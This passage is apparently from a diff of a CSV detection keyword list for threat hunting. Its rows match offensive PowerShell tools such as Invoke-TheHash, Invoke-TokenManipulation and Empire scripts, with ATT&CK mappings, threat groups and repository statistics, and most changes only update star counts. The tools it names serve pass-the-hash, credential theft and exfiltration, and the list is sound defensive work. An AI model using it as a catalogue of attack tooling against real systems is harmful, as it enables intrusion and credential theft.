T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence 
- WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of 
scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*invokestealthuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" 
"*Invoke-StealthUserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful 
offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-TheHash*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.ps1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psd1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psm1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" -"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-TmpDavFS*","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","132","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" "*Invoke-TokenManipulation*","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful 
offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
